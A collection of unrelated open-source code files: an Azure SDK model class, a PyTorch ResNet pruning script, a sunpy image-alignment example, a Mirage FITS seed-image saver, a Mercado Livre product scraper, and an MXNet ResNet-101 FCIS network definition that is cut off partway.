# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class DeploymentProperties(Model): """Deployment properties. :param template: The template content. It can be a JObject or a well formed JSON string. Use only one of Template or TemplateLink. :type template: object :param template_link: The template URI. Use only one of Template or TemplateLink. :type template_link: :class:`TemplateLink <azure.mgmt.resource.resources.models.TemplateLink>` :param parameters: Deployment parameters. It can be a JObject or a well formed JSON string. Use only one of Parameters or ParametersLink. :type parameters: object :param parameters_link: The parameters URI. Use only one of Parameters or ParametersLink. :type parameters_link: :class:`ParametersLink <azure.mgmt.resource.resources.models.ParametersLink>` :param mode: The deployment mode. Possible values include: 'Incremental', 'Complete' :type mode: str or :class:`DeploymentMode <azure.mgmt.resource.resources.models.DeploymentMode>` :param debug_setting: The debug setting of the deployment. :type debug_setting: :class:`DebugSetting <azure.mgmt.resource.resources.models.DebugSetting>` """ _validation = { 'mode': {'required': True}, } _attribute_map = { 'template': {'key': 'template', 'type': 'object'}, 'template_link': {'key': 'templateLink', 'type': 'TemplateLink'}, 'parameters': {'key': 'parameters', 'type': 'object'}, 'parameters_link': {'key': 'parametersLink', 'type': 'ParametersLink'}, 'mode': {'key': 'mode', 'type': 'DeploymentMode'}, 'debug_setting': {'key': 'debugSetting', 'type': 'DebugSetting'}, } def __init__(self, mode, template=None, template_link=None, parameters=None, parameters_link=None, debug_setting=None): self.template = template self.template_link = template_link self.parameters = parameters self.parameters_link = parameters_link self.mode = mode self.debug_setting = debug_setting
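
# Minimal usage sketch (illustrative only, not part of the generated SDK file):
# build DeploymentProperties for an incremental deployment with an inline
# template; the template and parameter contents below are placeholders.
if __name__ == '__main__':
    example_properties = DeploymentProperties(
        mode='Incremental',
        template={'$schema': 'https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#',
                  'contentVersion': '1.0.0.0',
                  'resources': []},
        parameters={},
    )
    print(example_properties.mode, example_properties.template['contentVersion'])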
the-stack_106_24302
import os import argparse import numpy as np import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms from models import * # Prune settings parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar10', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=256, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=110, help='depth of the resnet') parser.add_argument('--model', default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('-v', default='A', type=str, help='version of the model') parser.add_argument('--prune', default='large', type=str, help='prune method to use') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() if not os.path.exists(args.save): os.makedirs(args.save) model = resnet(depth=args.depth, dataset=args.dataset) if args.cuda: model.cuda() if args.model: if os.path.isfile(args.model): print("=> loading checkpoint '{}'".format(args.model)) checkpoint = torch.load(args.model) args.start_epoch = checkpoint['epoch'] best_prec1 = checkpoint['best_prec1'] model.load_state_dict(checkpoint['state_dict']) print("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}" .format(args.model, checkpoint['epoch'], best_prec1)) else: print("=> no checkpoint found at '{}'".format(args.resume)) print('Pre-processing Successful!') # simple test model after Pre-processing prune (simple set BN scales to zeros) def test(model): kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {} if args.dataset == 'cifar10': test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data/dataset/cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])), batch_size=args.test_batch_size, shuffle=False, **kwargs) elif args.dataset == 'cifar100': test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])), batch_size=args.test_batch_size, shuffle=False, **kwargs) else: raise ValueError("No valid dataset is given.") model.eval() correct = 0 for data, target in test_loader: if args.cuda: data, target = data.cuda(), target.cuda() data, target = Variable(data, volatile=True), Variable(target) output = model(data) pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability correct += pred.eq(target.data.view_as(pred)).cpu().sum() print('\nTest set: Accuracy: {}/{} ({:.1f}%)\n'.format( correct, len(test_loader.dataset), 100. 
* correct / len(test_loader.dataset)))
    return correct / float(len(test_loader.dataset))

acc = test(model)

skip = {
    'A': [36],
    'B': [36, 38, 74],
}

prune_prob = {
    'A': [0.5, 0.0, 0.0],
    'B': [0.5, 0.4, 0.3],
}

layer_id = 1
cfg = []
cfg_mask = []
for m in model.modules():
    if isinstance(m, nn.Conv2d):
        out_channels = m.weight.data.shape[0]
        if layer_id in skip[args.v]:
            cfg_mask.append(torch.ones(out_channels))
            cfg.append(out_channels)
            layer_id += 1
            continue
        if layer_id % 2 == 0:
            stage = layer_id // 36
            if layer_id <= 36:
                stage = 0
            elif layer_id <= 72:
                stage = 1
            elif layer_id <= 108:
                stage = 2
            prune_prob_stage = prune_prob[args.v][stage]
            weight_copy = m.weight.data.abs().clone().cpu().numpy()
            L1_norm = np.sum(weight_copy, axis=(1, 2, 3))
            num_keep = int(out_channels * (1 - prune_prob_stage))
            arg_max = np.argsort(L1_norm)
            # arg_max_rev = arg_max[::-1][:num_keep]
            if args.prune == 'large':
                arg_max_rev = arg_max[::-1][:num_keep]
            elif args.prune == 'small':
                arg_max_rev = arg_max[:num_keep]
            elif args.prune == 'random':
                arg_max_rev = np.random.choice(arg_max, num_keep, replace=False)
            mask = torch.zeros(out_channels)
            mask[arg_max_rev.tolist()] = 1
            # indices of the filters that are pruned away; zero out their weights in place
            mask_neg = np.setdiff1d(np.arange(out_channels), arg_max_rev)
            m.weight.data[mask_neg.tolist(), :, :, :] = 0
            cfg_mask.append(mask)
            cfg.append(num_keep)
            layer_id += 1
            continue
        layer_id += 1

torch.save({'cfg': cfg, 'state_dict': model.state_dict()}, os.path.join(args.save, 'pruned.pth.tar'))

acc = test(model)

num_parameters = sum([param.nelement() for param in model.parameters()])
with open(os.path.join(args.save, "prune.txt"), "w") as fp:
    fp.write("Number of parameters: \n"+str(num_parameters)+"\n")
    fp.write("Test accuracy: \n"+str(acc)+"\n")
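
# Example invocation (illustrative; the script name and paths are assumptions,
# not taken from the repository):
#
#   python resprune.py --dataset cifar10 --depth 110 \
#       --model ./logs/checkpoint.pth.tar --save ./logs/pruned \
#       -v A --prune large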
the-stack_106_24307
""" ============================================== Auto-Aligning AIA and HMI Data During Plotting ============================================== This example shows how to auto-align two images with different reference frames during plotting. Here we use the optional keyword ``autoalign`` when calling Map's :meth:`~sunpy.map.GenericMap.plot` method. The reference frames are defined by the respective World Coordinate System (WCS) information. See :ref:`sphx_glr_generated_gallery_map_transformations_reprojection_align_aia_hmi.py` for an alternate approach to image alignment, where one of the maps is modified prior to plotting, and thus is available for purposes other than plotting. """ import matplotlib.pyplot as plt import astropy.units as u import sunpy.data.sample import sunpy.map ###################################################################### # We use the AIA image and HMI image from the sample data. For the # HMI map, we use the special HMI color map, which expects the plotted # range to be -1500 to 1500. map_aia = sunpy.map.Map(sunpy.data.sample.AIA_171_IMAGE) map_hmi = sunpy.map.Map(sunpy.data.sample.HMI_LOS_IMAGE) map_hmi.plot_settings['cmap'] = "hmimag" map_hmi.plot_settings['norm'] = plt.Normalize(-1500, 1500) ###################################################################### # Plot both images side by side. Note that the HMI image is oriented # "upside down" relative to the AIA image. fig = plt.figure(figsize=(12, 5)) ax1 = fig.add_subplot(121, projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 99.9)*u.percent) ax2 = fig.add_subplot(122, projection=map_hmi) map_hmi.plot(axes=ax2) ###################################################################### # Setting ``autoalign=True`` allows plotting the HMI image onto axes # defined by the AIA reference frame. In contrast to the above code # block, we intentionally set the ``projection`` for the axes to be # the AIA map # instead of the HMI map. We also need to manually set # the plot limits because Matplotlib gets confused by the off-disk # parts of the image. Note that the HMI image now has the same # orientation as the AIA image. fig = plt.figure(figsize=(12, 5)) ax1 = fig.add_subplot(121, projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 99.9)*u.percent) ax2 = fig.add_subplot(122, projection=map_aia) map_hmi.plot(axes=ax2, autoalign=True, title='HMI image in AIA reference frame') ax2.axis(ax1.axis()) ###################################################################### # We can directly plot them over one another, by setting the # transparency of the HMI plot. fig = plt.figure() ax1 = fig.add_subplot(projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 99.9)*u.percent) map_hmi.plot(axes=ax1, autoalign=True, alpha=0.5) ax1.set_title('HMI overlaid on AIA') plt.show() # sphinx_gallery_thumbnail_number = 2
the-stack_106_24308
#! /usr/bin/env python """ Utility for saving seed images """ import logging import os from astropy.io import fits import numpy as np import mirage from mirage.logging import logging_functions from mirage.utils.constants import LOG_CONFIG_FILENAME, STANDARD_LOGFILE_NAME classdir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../')) log_config_file = os.path.join(classdir, 'logging', LOG_CONFIG_FILENAME) logging_functions.create_logger(log_config_file, STANDARD_LOGFILE_NAME) def save(seed_image, param_file, parameters, photflam, photfnu, pivot_wavelength, fullframe_size, nominal_dimensions, coord_adjust, grism_direct_factor, filename=None, segmentation_map=None, frametime=None, base_unit='ADU'): """Save a seed image """ logger = logging.getLogger('mirage.seed_image.save_seed.save') arrayshape = seed_image.shape if len(arrayshape) == 2: units = '{}/sec'.format(base_unit) yd, xd = arrayshape tgroup = 0. logger.info('Seed image is 2D.') elif len(arrayshape) == 3: units = base_unit g, yd, xd = arrayshape tgroup = frametime * (parameters['Readout']['nframe'] + parameters['Readout']['nskip']) logger.info('Seed image is 3D.') elif len(arrayshape) == 4: units = base_unit integ, g, yd, xd = arrayshape tgroup = frametime * (parameters['Readout']['nframe'] + parameters['Readout']['nskip']) logger.info('Seed image is 4D.') xcent_fov = xd / 2 ycent_fov = yd / 2 kw = {} kw['xcenter'] = xcent_fov kw['ycenter'] = ycent_fov kw['units'] = kw['UNITS'] = units kw['TGROUP'] = tgroup if parameters['Readout']['pupil'][0].upper() == 'F': usefilt = 'pupil' else: usefilt = 'filter' if filename is None: basename = os.path.join(parameters['Output']['directory'], parameters['Output']['file'][0:-5].split('/')[-1]) filename = '{}_{}_seed_image.fits'.format(basename, parameters['Readout'][usefilt]) # Set FGS filter to "N/A" in the output file # as this is the value DMS looks for. 
if parameters['Readout'][usefilt] == "NA": parameters['Readout'][usefilt] = "N/A" kw['filter'] = parameters['Readout'][usefilt] kw['PHOTFLAM'] = photflam kw['PHOTFNU'] = photfnu kw['PHOTPLAM'] = pivot_wavelength * 1.e4 # put into angstroms kw['NOMXDIM'] = nominal_dimensions[1] kw['NOMYDIM'] = nominal_dimensions[0] kw['NOMXSTRT'] = np.int(coord_adjust['xoffset'] + 1) kw['NOMXEND'] = np.int(nominal_dimensions[1] + coord_adjust['xoffset']) kw['NOMYSTRT'] = np.int(coord_adjust['yoffset'] + 1) kw['NOMYEND'] = np.int(nominal_dimensions[0] + coord_adjust['yoffset']) # Files/inputs used during seed image production kw['YAMLFILE'] = param_file kw['GAINFILE'] = parameters['Reffiles']['gain'] kw['DISTORTN'] = parameters['Reffiles']['astrometric'] kw['IPC'] = parameters['Reffiles']['ipc'] kw['PIXARMAP'] = parameters['Reffiles']['pixelAreaMap'] kw['CROSSTLK'] = parameters['Reffiles']['crosstalk'] kw['FLUX_CAL'] = parameters['Reffiles']['flux_cal'] kw['FTHRUPUT'] = parameters['Reffiles']['filter_throughput'] kw['PTSRCCAT'] = parameters['simSignals']['pointsource'] kw['GALAXCAT'] = parameters['simSignals']['galaxyListFile'] kw['EXTNDCAT'] = parameters['simSignals']['extended'] kw['MTPTSCAT'] = parameters['simSignals']['movingTargetList'] kw['MTSERSIC'] = parameters['simSignals']['movingTargetSersic'] kw['MTEXTEND'] = parameters['simSignals']['movingTargetExtended'] kw['NONSDRAL'] = parameters['simSignals']['movingTargetToTrack'] kw['BKGDRATE'] = parameters['simSignals']['bkgdrate'] kw['TRACKING'] = parameters['Telescope']['tracking'] kw['POISSON'] = parameters['simSignals']['poissonseed'] kw['PSFWFE'] = parameters['simSignals']['psfwfe'] kw['PSFWFGRP'] = parameters['simSignals']['psfwfegroup'] kw['MRGEVRSN'] = mirage.__version__ # Seed images provided to disperser are always embedded in an array # with dimensions equal to full frame * self.grism_direct_factor if parameters['Inst']['mode'] in ['wfss', 'ts_wfss']: kw['NOMXDIM'] = fullframe_size kw['NOMYDIM'] = fullframe_size kw['NOMXSTRT'] = np.int(fullframe_size * (grism_direct_factor - 1) / 2.) kw['NOMXEND'] = kw['NOMXSTRT'] + fullframe_size - 1 kw['NOMYSTRT'] = np.int(fullframe_size * (grism_direct_factor - 1) / 2.) kw['NOMYEND'] = kw['NOMYSTRT'] + fullframe_size - 1 kw['GRISMPAD'] = grism_direct_factor seedinfo = kw save_single_fits(seed_image, filename, key_dict=kw, image2=segmentation_map, image2type='SEGMAP') # Keep this print statement in the code that calls this function #print("Seed image and segmentation map saved as {}".format(self.seed_file)) #print("Seed image, segmentation map, and metadata available as:") #print("self.seedimage, self.seed_segmap, self.seedinfo.") return filename, seedinfo def save_single_fits(image, name, key_dict=None, image2=None, image2type=None): # Save an array into the first extension of a fits file h0 = fits.PrimaryHDU() h1 = fits.ImageHDU(image, name='DATA') if image2 is not None: h2 = fits.ImageHDU(image2) if image2type is not None: h2.header['EXTNAME'] = image2type # if a keyword dictionary is provided, put the # keywords into the 0th and 1st extension headers if key_dict is not None: for key in key_dict: h0.header[key] = key_dict[key] h1.header[key] = key_dict[key] if image2 is None: hdulist = fits.HDUList([h0, h1]) else: hdulist = fits.HDUList([h0, h1, h2]) hdulist.writeto(name, overwrite=True)
the-stack_106_24309
from bs4 import BeautifulSoup
import requests
import sys


def pega_items(caixa_produto):
    # For each product div found, do the following:
    for produtos_achados in caixa_produto:
        # Grab the desired attributes of each item
        produto_descricao = produtos_achados.find('h2', class_='ui-search-item__title')
        produto_preco = produtos_achados.find('span', class_='price-tag-fraction')
        produto_url = produtos_achados.find('a', class_="ui-search-item__group__element ui-search-link")['href']
        # From here to the end of the function, check whether each element exists
        # and contains text; if so it is printed, otherwise it is ignored
        if produto_descricao and produto_descricao.text != "":
            print(f'\nDescription: {produto_descricao.text}')
        if produto_preco and produto_preco.text != "":
            print(f'Price: R${produto_preco.text},00')
        if produto_url and produto_url != "":
            print(f'Url: {produto_url}')


def pega_numero_paginas():
    while True:
        try:
            # Ask for the number of result pages; return it on success,
            # otherwise ignore the invalid input and ask again
            numero_paginas = int(input('How many result pages do you want to see? '))
            return numero_paginas
        except ValueError:
            pass


num_paginas = pega_numero_paginas()
if num_paginas > 40:  # 40 is the maximum number of pages Mercado Livre shows,
    num_paginas = 40  # so simply cap the value at 40

nome_produto = str(input('Enter the name of the product you want: '))  # ask for the product name as a string
url = f'https://lista.mercadolivre.com.br/{nome_produto}'  # build the search url with the product name

# Loop over all the pages the user asked for
for i in range(0, num_paginas):
    site_html = requests.get(url)  # fetch the page html
    site_bs4 = BeautifulSoup(site_html.text, 'html.parser')  # parse the page html with Beautiful Soup
    caixa_produto = site_bs4.findAll('div', class_='ui-search-result__content-wrapper')  # collect the product boxes into a list
    print(f'\n\nPage {i+1}:')  # print the page number for readability
    pega_items(caixa_produto)  # call pega_items with the product list gathered above: caixa_produto
    try:
        # Try to grab the url of the next results page
        url = site_bs4.find('a', class_='andes-pagination__link ui-search-link')['href']
    except (TypeError, KeyError):
        sys.exit()  # no further result pages, so stop the application

# get_item()
the-stack_106_24312
# -------------------------------------------------------- # Fully Convolutional Instance-aware Semantic Segmentation # Copyright (c) 2017 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by Haozhi Qi, Guodong Zhang, Yi Li # -------------------------------------------------------- import pickle as cPickle import mxnet as mx from utils.symbol import Symbol from operator_py.proposal import * from operator_py.proposal_annotator import * from operator_py.box_parser import * from operator_py.box_annotator_ohem import * class resnet_v1_101_fcis(Symbol): def __init__(self): """ Use __init__ to define parameter network needs """ self.eps = 1e-5 self.use_global_stats = True self.workspace = 512 self.units = (3, 4, 23, 3) # use for 101 self.filter_list = [256, 512, 1024, 2048] def get_resnet_v1_conv4(self, data): conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=64, pad=(3, 3), kernel=(7, 7), stride=(2, 2), no_bias=True) bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale_conv1 = bn_conv1 conv1_relu = mx.symbol.Activation(name='conv1_relu', data=scale_conv1, act_type='relu') pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu, pooling_convention='full', pad=(0, 0), kernel=(3, 3), stride=(2, 2), pool_type='max') res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch1 = bn2a_branch1 res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2a = bn2a_branch2a res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=scale2a_branch2a, act_type='relu') res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2b = bn2a_branch2b res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=scale2a_branch2b, act_type='relu') res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2c = bn2a_branch2c res2a = mx.symbol.broadcast_add(name='res2a', *[scale2a_branch1, scale2a_branch2c]) res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a, act_type='relu') res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2a = bn2b_branch2a res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=scale2b_branch2a, act_type='relu') res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), 
stride=(1, 1), no_bias=True) bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2b = bn2b_branch2b res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=scale2b_branch2b, act_type='relu') res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2c = bn2b_branch2c res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu, scale2b_branch2c]) res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b, act_type='relu') res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2a = bn2c_branch2a res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=scale2c_branch2a, act_type='relu') res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2b = bn2c_branch2b res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=scale2c_branch2b, act_type='relu') res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2c = bn2c_branch2c res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu, scale2c_branch2c]) res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c, act_type='relu') res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch1 = bn3a_branch1 res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2a = bn3a_branch2a res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=scale3a_branch2a, act_type='relu') res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2b = bn3a_branch2b res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=scale3a_branch2b, act_type='relu') res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', 
data=res3a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2c = bn3a_branch2c res3a = mx.symbol.broadcast_add(name='res3a', *[scale3a_branch1, scale3a_branch2c]) res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a, act_type='relu') res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2a = bn3b1_branch2a res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=scale3b1_branch2a, act_type='relu') res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2b = bn3b1_branch2b res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=scale3b1_branch2b, act_type='relu') res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2c = bn3b1_branch2c res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu, scale3b1_branch2c]) res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1, act_type='relu') res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2a = bn3b2_branch2a res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=scale3b2_branch2a, act_type='relu') res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2b = bn3b2_branch2b res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=scale3b2_branch2b, act_type='relu') res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2c = bn3b2_branch2c res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu, scale3b2_branch2c]) res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2, act_type='relu') res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2a = bn3b3_branch2a res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=scale3b3_branch2a, act_type='relu') res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', 
data=res3b3_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2b = bn3b3_branch2b res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=scale3b3_branch2b, act_type='relu') res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2c = bn3b3_branch2c res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu, scale3b3_branch2c]) res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3, act_type='relu') res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch1 = bn4a_branch1 res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2a = bn4a_branch2a res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=scale4a_branch2a, act_type='relu') res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2b = bn4a_branch2b res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=scale4a_branch2b, act_type='relu') res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c, 